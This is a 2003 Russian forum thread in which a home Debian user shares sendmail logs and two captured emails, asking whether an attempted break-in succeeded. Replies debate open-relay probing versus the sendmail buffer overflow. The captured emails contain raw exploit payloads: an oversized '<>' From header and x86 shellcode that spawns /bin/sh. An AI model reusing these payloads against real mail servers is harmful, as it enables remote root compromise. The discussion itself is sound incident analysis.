The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]




Версия для распечатки Пред. тема | След. тема
Новые ответы [ Отслеживать ]
кажись пробовали ломать..... или уже взломали :))), !*! skydion, 07-Мрт-03, 20:37  [смотреть все]
Вот балуюсь дома debian как всегда нету времени на ее настройку.
Поставил sendmail и ядро 2.4.20 так как там нужно фаерволить через
iptables с которым еще не разобрался то и фаервола у меня нету :)
и вот видимо вчера пробовали ломать этот самый sendmail

Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: Milter: no active filter
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 220 myhome.net ESMTP Sendmail 8.12.7/8.12.7; Thu, 6 Mar 2003 19:50:46 +0200
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- helo yahoo.com
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 myhome.net Hello localhost [127.0.0.1], pleased to meet you
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- mail from: anonymous@yahoo.com
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.1.0 anonymous@yahoo.com... Sender ok
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- rcpt to: lp
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.1.5 lp... Recipient ok
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- data
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 354 Enter mail, end with "." on a line by itself
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: from=anonymous@yahoo.com, size=2379, class=0, nrcpts=1, msgid=<200303061750.h26HokXY000450@myhome.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1]
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.0.0 h26HokXY000450 Message accepted for delivery
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: --- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data
Mar  7 19:11:10 safari sm-mta[288]: error: safesasl(/etc/sasldb) failed: No such file or directory
Mar  7 19:11:10 safari sm-mta[291]: starting daemon (8.12.7): SMTP+queueing@00:10:00
Mar  7 19:11:10 safari sm-mta[291]: STARTTLS: ServerCertFile missing
Mar  7 19:11:10 safari sm-mta[291]: started as: /usr/sbin/sendmail -Am -L sm-mta -bd -q10m
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: to=root, delay=23:20:50, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: done; delay=23:20:50, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: to=root, delay=23:20:49, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: done; delay=23:20:49, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: to=root, delay=23:20:48, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: done; delay=23:20:48, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: to=root, delay=23:20:47, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: done; delay=23:20:47, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000443: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000443: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000443: to=root, delay=23:20:46, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent

А дальше идет видимо сам эксплоит вот вопрос неможе кто либо сказать мне
был взлом или нет? Собственно мне это не очень и нужно так как система
тестовая но все же интересно разобратся раз уж так случилось :)

From anonymous@yahoo.com  Fri Mar  7 19:11:10 2003
Return-Path: <anonymous@yahoo.com>
Received: from yahoo.com (localhost [127.0.0.1])
    by myhome.net (8.12.7/8.12.7) with SMTP id h26HoKXY000439
    for lp; Thu, 6 Mar 2003 19:50:20 +0200
Date: Thu, 6 Mar 2003 19:50:20 +0200
Message-Id: <200303061750.h26HoKXY000439@myhome.net>
From: "<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Subject: hello
Status: RO
Content-Length: 2047
Lines: 1

øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøëëèùÿÿÿÍÃ_ÿG1ÀPjjTY°f1ÛCÿ׺ ÿÿþ¹ßÿÿÿ1ÊRºýÿû¨¹ÿÿÿÿ1ÊRT^jVPP^TY°fj[ÿ×V[1ɱ1À°?Iÿ×Aâö1ÀPh//shh/binT[PSTY1Ò° ÿ×øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø

From anonymous@yahoo.com  Fri Mar  7 19:11:10 2003
Return-Path: <anonymous@yahoo.com>
Received: from yahoo.com (localhost [127.0.0.1])
    by myhome.net (8.12.7/8.12.7) with SMTP id h26HoLXY000440
    for lp; Thu, 6 Mar 2003 19:50:21 +0200
Date: Thu, 6 Mar 2003 19:50:21 +0200
Message-Id: <200303061750.h26HoLXY000440@myhome.net>
From: "<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Subject: hello
Status: RO
Content-Length: 2047
Lines: 1

øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøëëèùÿÿÿÍÃ_ÿG1ÀPjjTY°f1ÛCÿ׺ ÿÿþ¹ßÿÿÿ1ÊRºýÿû¨¹ÿÿÿÿ1ÊRT^jVPP^TY°fj[ÿ×V[1ɱ1À°?Iÿ×Aâö1ÀPh//shh/binT[PSTY1Ò° ÿ×øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø


  • RE: кажись пробовали ломать..... или уже взломали :))), !*! Booter, 04:15 , 08-Мрт-03 (1)
    >и вот видимо вчера пробовали ломать этот самый sendmail

    Не сколько ломать, сколько тестировать на открытый релей. Через мою почтовку прокачали как-то гигамайт спама, причем загрузка машины была 100%... :) Так что с этим делом поосторожнее можно и в спаммеры попасть и на деньги влететь...

    • RE: кажись пробовали ломать..... или уже взломали :))), !*! skydion, 12:17 , 08-Мрт-03 (2)
      Да нет не думаю, что это тестирование на релей..... скорее тестирование на последний
      буфер-оверфлов в sendmail.

      У меня уже было тестирование :) там вася пробовал письма по 20 различным адресам кинуть,
      а здесь на lp кидают тоесть я выступаю в роли жертвы, и последние два письма, это из
      рутового мейлбокса, там их штук 15 лежит я их еще не удалял.... думаю дизасемблить
      начало этого кода, там видно будет...

      а если посмотреть на лог подключения к серверу то видно что там есть
      Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450:
      --- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
      Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data

    • RE: кажись пробовали ломать..... или уже взломали :))), !*! skydion, 12:20 , 08-Мрт-03 (3)
      Да нет, не думаю, что это тестирование на релей..... скорее тестирование на последний
      буфер-оверфлов в sendmail.

      У меня уже было тестирование :) там вася пробовал письма по 20-30 различным адресам кинуть, а
      здесь на lp кидают тоесть я выступаю в роли жертвы, и последние два письма, это из
      рутового мейлбокса, там их штук 15 лежит я их еще не удалял.... думаю дизасемблить
      начало этого кода, там видно будет...  а если посмотреть на лог подключения к серверу то видно,
      что там есть строки:
      Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: --- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
      Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data

      с какой это радости sendmail бросает канал?




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру